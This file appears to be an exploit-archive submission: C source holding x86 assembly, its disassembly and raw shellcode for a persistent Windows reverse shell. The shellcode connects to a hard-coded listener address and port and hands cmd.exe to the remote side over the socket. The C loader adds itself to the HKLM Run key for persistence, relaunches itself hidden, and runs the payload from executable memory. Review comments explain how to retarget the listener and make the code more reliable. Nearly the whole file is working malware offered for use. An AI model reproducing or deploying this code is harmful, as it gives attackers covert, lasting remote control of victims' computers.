/*
# Title : Windows x86 persistent reverse shell tcp
# Author : Roziul Hasan Khan Shifat
# Date : 04-09-2016
# Tested on : Windows 7 x86
*/
/*
Note: the first run must be as administrator. The persistence entry is written under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, which a standard user cannot modify; without that right the registry step fails and only the current session connects back (nothing survives a reboot).
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->Ldr->InMemoryOrderModuleList (list head)
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;DllBase of the 3rd InMemoryOrder entry - exe, ntdll, kernel32 on the tested Win7; this load order is assumed, not guaranteed on every Windows build
mov ebx,[ecx+0x3c] ;IMAGE_DOS_HEADER.e_lfanew (offset of the PE signature)
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress (PE32 offset 0x78 from the signature)
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
xor edx,edx
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4] ;AddressOfFunctions[edx] where edx is the 1-based counter of the name loop; AddressOfNameOrdinals (+0x24) is never consulted, so this only works where kernel32's name index happens to line up with its function index (true on the tested Win7 build, not a portable export lookup)
add edx,ecx ;GetProcAddress()
xor eax,eax
push eax
sub esp,24
lea esi,[esp]
mov [esi],dword edx ;GetProcAddress() at offset 0
mov edi,ecx ;kernel32.dll
;------------------------------
;finding address of CreateProcessA()
push 0x42424173
mov [esp+2],word ax
push 0x7365636f
push 0x72506574
push 0x61657243
lea eax,[esp]
push eax
push ecx
call edx
;----------------------------
add esp,16
mov [esi+4],dword eax ;CreateProcessA() at offset 4
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
mov [esi+8],dword eax ;ExitProcess() at offset 8
;-----------------------------------------------------
;loading ws2_32.dll - note the "ws2_32.dll" string below is three pushes (12 bytes) but only 8 are released afterwards (add esp,8); harmless here because the function table is reached through esi, but the stack stays 4 bytes deeper than intended
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
xor ecx,ecx
push 0x41416c6c
mov [esp+2],word cx
push 0x642e3233
push 0x5f327377
lea ecx,[esp]
push ecx
call eax
add esp,8
mov edi,eax ;ws2_32.dll
;-----------------------------------
;finding address of WSAStartup()
xor ecx,ecx
push 0x41417075
mov [esp+2],word cx
push 0x74726174
push 0x53415357
lea ecx,[esp]
push ecx
push eax
call dword [esi]
add esp,12
mov [esi+12],dword eax ;WSAStartup() at offset 12
;------------------------------------------
;finding address of WSASocketA()
xor ecx,ecx
push 0x42424174
mov [esp+2],word cx
push 0x656b636f
push 0x53415357
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
mov [esi+16],dword eax ;WSASocketA() at offset 16
;-----------------------------
;finding address of WSAConnect()
xor ecx,ecx
push 0x41417463
mov [esp+2],word cx
push 0x656e6e6f
push 0x43415357
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
mov [esi+20],dword eax ;WSAConnect() at offset 20
;------------------------------------------------
;WSAStartup(0x0202 /* 514 = Winsock 2.2 */, &wsaData) - 400 bytes of stack reserved for the WSADATA structure
xor ecx,ecx
push ecx
mov cx,400
sub esp,ecx
lea ecx,[esp]
xor ebx,ebx
mov bx,514
push ecx
push ebx
call dword [esi+12]
;-------------------------------
;WSASocketA(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6, NULL, 0, 0) - dwFlags=0 gives a non-overlapped socket (socket() would default to overlapped), which is what lets the handle be used as cmd.exe's std handles below
xor ecx,ecx
push ecx
push ecx
push ecx
mov cl,6
push ecx
sub ecx,5
push ecx
inc ecx
push ecx
call dword [esi+16]
xchg edi,eax ;SOCKET
;--------------------------------------------------
;WSAConnect(sock,(SOCKADDR*)&addr,sizeof(addr),NULL,NULL,NULL,NULL) - the connect: loop below retries on every non-zero return with no delay, so it spins at full CPU until the listener is reachable
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
mov [esp],byte 2
mov [esp+2],word 0x5c11 ;sin_port = htons(4444) = 0x115c (bytes 11 5c) - change to your listener port
mov [esp+4],dword 0x81e8a8c0 ;sin_addr = 192.168.232.129 (bytes c0 a8 e8 81) - must be changed to your listener; patch the same bytes in the shellcode[] string below as well
connect:
xor ecx,ecx
lea ebx,[esp]
push ecx
push ecx
push ecx
push ecx
mov cl,16
push ecx
push ebx
push edi
call dword [esi+20]
xor ecx,ecx
cmp eax,ecx
jnz connect
;----------------------------------------------
xor ecx,ecx
sub esp,16
lea edx,[esp] ;PROCESS_INFORMATION
push edi
push edi
push edi
push ecx
push word cx
push word cx
mov cl,255
inc ecx
push ecx
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
mov cl,68
push ecx
lea ecx,[esp]
xor edx,edx
push 0x41657865
mov [esp+3],byte dl
push 0x2e646d63
lea edx,[esp]
;-----------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,bInheritHandles=TRUE,0,NULL,NULL,&startupInfo,&processInfo) - STARTUPINFO.dwFlags = STARTF_USESTDHANDLES (0x100) with hStdInput/hStdOutput/hStdError all set to the socket; lpProcessInformation is ebx (the now-unused 16-byte sockaddr buffer), not the 16 bytes reserved above; the ExitProcess that follows ends this loader while cmd.exe keeps the inherited socket
push ebx
push ecx
xor ecx,ecx
push ecx
push ecx
push ecx
inc ecx
push ecx
xor ecx,ecx
push ecx
push ecx
push edx
push ecx
call dword [esi+4]
push eax
call dword [esi+8]
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx
00000023 <g>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <g>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <g>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <g>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 c0 xor %eax,%eax
4d: 50 push %eax
4e: 83 ec 18 sub $0x18,%esp
51: 8d 34 24 lea (%esp),%esi
54: 89 16 mov %edx,(%esi)
56: 89 cf mov %ecx,%edi
58: 68 73 41 42 42 push $0x42424173
5d: 66 89 44 24 02 mov %ax,0x2(%esp)
62: 68 6f 63 65 73 push $0x7365636f
67: 68 74 65 50 72 push $0x72506574
6c: 68 43 72 65 61 push $0x61657243
71: 8d 04 24 lea (%esp),%eax
74: 50 push %eax
75: 51 push %ecx
76: ff d2 call *%edx
78: 83 c4 10 add $0x10,%esp
7b: 89 46 04 mov %eax,0x4(%esi)
7e: 31 c9 xor %ecx,%ecx
80: 68 65 73 73 41 push $0x41737365
85: 88 4c 24 03 mov %cl,0x3(%esp)
89: 68 50 72 6f 63 push $0x636f7250
8e: 68 45 78 69 74 push $0x74697845
93: 8d 0c 24 lea (%esp),%ecx
96: 51 push %ecx
97: 57 push %edi
98: ff 16 call *(%esi)
9a: 83 c4 0c add $0xc,%esp
9d: 89 46 08 mov %eax,0x8(%esi)
a0: 31 c9 xor %ecx,%ecx
a2: 51 push %ecx
a3: 68 61 72 79 41 push $0x41797261
a8: 68 4c 69 62 72 push $0x7262694c
ad: 68 4c 6f 61 64 push $0x64616f4c
b2: 8d 0c 24 lea (%esp),%ecx
b5: 51 push %ecx
b6: 57 push %edi
b7: ff 16 call *(%esi)
b9: 83 c4 0c add $0xc,%esp
bc: 31 c9 xor %ecx,%ecx
be: 68 6c 6c 41 41 push $0x41416c6c
c3: 66 89 4c 24 02 mov %cx,0x2(%esp)
c8: 68 33 32 2e 64 push $0x642e3233
cd: 68 77 73 32 5f push $0x5f327377
d2: 8d 0c 24 lea (%esp),%ecx
d5: 51 push %ecx
d6: ff d0 call *%eax
d8: 83 c4 08 add $0x8,%esp
db: 89 c7 mov %eax,%edi
dd: 31 c9 xor %ecx,%ecx
df: 68 75 70 41 41 push $0x41417075
e4: 66 89 4c 24 02 mov %cx,0x2(%esp)
e9: 68 74 61 72 74 push $0x74726174
ee: 68 57 53 41 53 push $0x53415357
f3: 8d 0c 24 lea (%esp),%ecx
f6: 51 push %ecx
f7: 50 push %eax
f8: ff 16 call *(%esi)
fa: 83 c4 0c add $0xc,%esp
fd: 89 46 0c mov %eax,0xc(%esi)
100: 31 c9 xor %ecx,%ecx
102: 68 74 41 42 42 push $0x42424174
107: 66 89 4c 24 02 mov %cx,0x2(%esp)
10c: 68 6f 63 6b 65 push $0x656b636f
111: 68 57 53 41 53 push $0x53415357
116: 8d 0c 24 lea (%esp),%ecx
119: 51 push %ecx
11a: 57 push %edi
11b: ff 16 call *(%esi)
11d: 83 c4 0c add $0xc,%esp
120: 89 46 10 mov %eax,0x10(%esi)
123: 31 c9 xor %ecx,%ecx
125: 68 63 74 41 41 push $0x41417463
12a: 66 89 4c 24 02 mov %cx,0x2(%esp)
12f: 68 6f 6e 6e 65 push $0x656e6e6f
134: 68 57 53 41 43 push $0x43415357
139: 8d 0c 24 lea (%esp),%ecx
13c: 51 push %ecx
13d: 57 push %edi
13e: ff 16 call *(%esi)
140: 83 c4 0c add $0xc,%esp
143: 89 46 14 mov %eax,0x14(%esi)
146: 31 c9 xor %ecx,%ecx
148: 51 push %ecx
149: 66 b9 90 01 mov $0x190,%cx
14d: 29 cc sub %ecx,%esp
14f: 8d 0c 24 lea (%esp),%ecx
152: 31 db xor %ebx,%ebx
154: 66 bb 02 02 mov $0x202,%bx
158: 51 push %ecx
159: 53 push %ebx
15a: ff 56 0c call *0xc(%esi)
15d: 31 c9 xor %ecx,%ecx
15f: 51 push %ecx
160: 51 push %ecx
161: 51 push %ecx
162: b1 06 mov $0x6,%cl
164: 51 push %ecx
165: 83 e9 05 sub $0x5,%ecx
168: 51 push %ecx
169: 41 inc %ecx
16a: 51 push %ecx
16b: ff 56 10 call *0x10(%esi)
16e: 97 xchg %eax,%edi
16f: 31 c9 xor %ecx,%ecx
171: 51 push %ecx
172: 51 push %ecx
173: 51 push %ecx
174: 51 push %ecx
175: c6 04 24 02 movb $0x2,(%esp)
179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp)
187: 81
00000188 <connect>:
188: 31 c9 xor %ecx,%ecx
18a: 8d 1c 24 lea (%esp),%ebx
18d: 51 push %ecx
18e: 51 push %ecx
18f: 51 push %ecx
190: 51 push %ecx
191: b1 10 mov $0x10,%cl
193: 51 push %ecx
194: 53 push %ebx
195: 57 push %edi
196: ff 56 14 call *0x14(%esi)
199: 31 c9 xor %ecx,%ecx
19b: 39 c8 cmp %ecx,%eax
19d: 75 e9 jne 188 <connect>
19f: 31 c9 xor %ecx,%ecx
1a1: 83 ec 10 sub $0x10,%esp
1a4: 8d 14 24 lea (%esp),%edx
1a7: 57 push %edi
1a8: 57 push %edi
1a9: 57 push %edi
1aa: 51 push %ecx
1ab: 66 51 push %cx
1ad: 66 51 push %cx
1af: b1 ff mov $0xff,%cl
1b1: 41 inc %ecx
1b2: 51 push %ecx
1b3: 31 c9 xor %ecx,%ecx
1b5: 51 push %ecx
1b6: 51 push %ecx
1b7: 51 push %ecx
1b8: 51 push %ecx
1b9: 51 push %ecx
1ba: 51 push %ecx
1bb: 51 push %ecx
1bc: 51 push %ecx
1bd: 51 push %ecx
1be: 51 push %ecx
1bf: b1 44 mov $0x44,%cl
1c1: 51 push %ecx
1c2: 8d 0c 24 lea (%esp),%ecx
1c5: 31 d2 xor %edx,%edx
1c7: 68 65 78 65 41 push $0x41657865
1cc: 88 54 24 03 mov %dl,0x3(%esp)
1d0: 68 63 6d 64 2e push $0x2e646d63
1d5: 8d 14 24 lea (%esp),%edx
1d8: 53 push %ebx
1d9: 51 push %ecx
1da: 31 c9 xor %ecx,%ecx
1dc: 51 push %ecx
1dd: 51 push %ecx
1de: 51 push %ecx
1df: 41 inc %ecx
1e0: 51 push %ecx
1e1: 31 c9 xor %ecx,%ecx
1e3: 51 push %ecx
1e4: 51 push %ecx
1e5: 52 push %edx
1e6: 51 push %ecx
1e7: ff 56 04 call *0x4(%esi)
1ea: 50 push %eax
1eb: ff 56 08 call *0x8(%esi)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Raw bytes of the listing above (Windows 7 x86). In order: walk PEB->Ldr
 * to find kernel32 and resolve GetProcAddress from its export table;
 * resolve CreateProcessA, ExitProcess and LoadLibraryA; load ws2_32.dll and
 * resolve WSAStartup / WSASocketA / WSAConnect; WSAStartup(2.2);
 * WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP); WSAConnect in a retry loop;
 * CreateProcessA("cmd.exe") with stdin/stdout/stderr redirected to the
 * socket; ExitProcess.
 *
 * The listener is hard-coded: the bytes "\x11\x5c" (port 4444, network
 * order) followed by "\xc0\xa8\xe8\x81" (192.168.232.129) near the end of
 * the string must be patched to point at your own listener.
 *
 * NOTE(review): this is a non-const global, so it lives in a writable,
 * non-executable data section; main() below calls straight into it, which
 * only works while DEP is not enforced for the process.
 */
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";
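/* The payload above is 32-bit code (fs:[0x30] PEB walk, 32-bit stack
 * layout); the loader must be built as an x86 binary. */
#ifdef _WIN64
#error "shellcode[] is x86-only; build this loader as a 32-bit executable"
#endif

/*
 * Registers `path` as the REG_SZ value "reverse_shell_tcp" under the HKLM
 * Run key, unless that value already holds the same path.
 *
 * Returns 1 when the value is in place (pre-existing or freshly written),
 * 0 when the key could not be opened or written - in practice: the process
 * is not running as administrator, since HKLM is not writable otherwise.
 *
 * Fixes versus the original: the open result and the query result are
 * actually checked (the original tested the handle, not the query result,
 * and used the handle even when the open had failed); the query size is
 * initialised (it was an uninitialised DWORD, so RegQueryValueExA could
 * write past the 200-byte buffer); the REG_SZ byte count includes the
 * terminating NUL as the registry API requires.
 */
static int install_run_key(const char *path)
{
    static const char *const RUN_KEY =
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
    static const char *const VALUE_NAME = "reverse_shell_tcp";
    HKEY run;
    char current[MAX_PATH + 1];
    DWORD size = sizeof(current) - 1;    /* leave one byte to NUL-terminate */
    DWORD type = 0;
    LONG rc;

    rc = RegOpenKeyExA(HKEY_LOCAL_MACHINE, RUN_KEY, 0,
                       KEY_QUERY_VALUE | KEY_SET_VALUE, &run);
    if (rc != ERROR_SUCCESS)
        return 0;

    rc = RegQueryValueExA(run, VALUE_NAME, NULL, &type, (LPBYTE)current, &size);
    if (rc == ERROR_SUCCESS && type == REG_SZ) {
        /* a stored string may lack its terminator; force one (size <= MAX_PATH) */
        current[size < sizeof(current) ? size : sizeof(current) - 1] = '\0';
        if (strcmp(current, path) == 0) {
            RegCloseKey(run);
            return 1;
        }
    }

    /* REG_SZ data must include the terminating NUL in its byte count */
    rc = RegSetValueExA(run, VALUE_NAME, 0, REG_SZ,
                        (const BYTE *)path, (DWORD)strlen(path) + 1);
    RegCloseKey(run);
    return rc == ERROR_SUCCESS;
}

/*
 * Copies shellcode[] into freshly allocated RWX memory and jumps to it.
 * shellcode[] is a writable global, so it is not in an executable section;
 * calling it in place (as the original did) faults as soon as DEP applies to
 * the process. The payload ends in ExitProcess(), so this only returns (1)
 * when the allocation fails.
 */
static int run_payload(void)
{
    SIZE_T len = sizeof(shellcode);
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL)
        return 1;
    memcpy(mem, shellcode, len);
    ((void (*)(void))mem)();    /* does not return */
    return 0;
}

/*
 * Entry point. Modes, chosen by argv[1] (absent => 1):
 *   78         - payload: run shellcode[] in this process.
 *   1 / other  - launcher: register this executable under the HKLM Run key,
 *                then start a second copy of itself with argument "78" and
 *                return at once, so the Run-key launched instance never
 *                blocks inside the payload.
 *
 * The registry step is best-effort in both modes (it needs administrator
 * rights, see the note at the top of the file). The executable's absolute
 * path comes from GetModuleFileNameA because argv[0] is not guaranteed to be
 * absolute, and a relative path in the Run key would not start at logon.
 */
int main(int li,char *a[])
{
    enum { MODE_LAUNCHER = 1, MODE_PAYLOAD = 78 };
    char path[MAX_PATH + 1];
    DWORD n;
    int mode;

    n = GetModuleFileNameA(NULL, path, MAX_PATH);
    if (n == 0 || n >= MAX_PATH) {
        /* fall back to argv[0] (possibly relative) if the lookup fails */
        if (li > 0 && a[0] != NULL) {
            strncpy(path, a[0], MAX_PATH);
            path[MAX_PATH] = '\0';
        } else {
            path[0] = '\0';
        }
    }

    if (path[0] != '\0')
        (void)install_run_key(path);

    mode = (li == 1) ? MODE_LAUNCHER : atoi(a[1]);

    if (mode == MODE_PAYLOAD)
        return run_payload();

    if (path[0] != '\0')
        ShellExecuteA(NULL, NULL, path, "78", NULL, SW_HIDE);
    return 0;
}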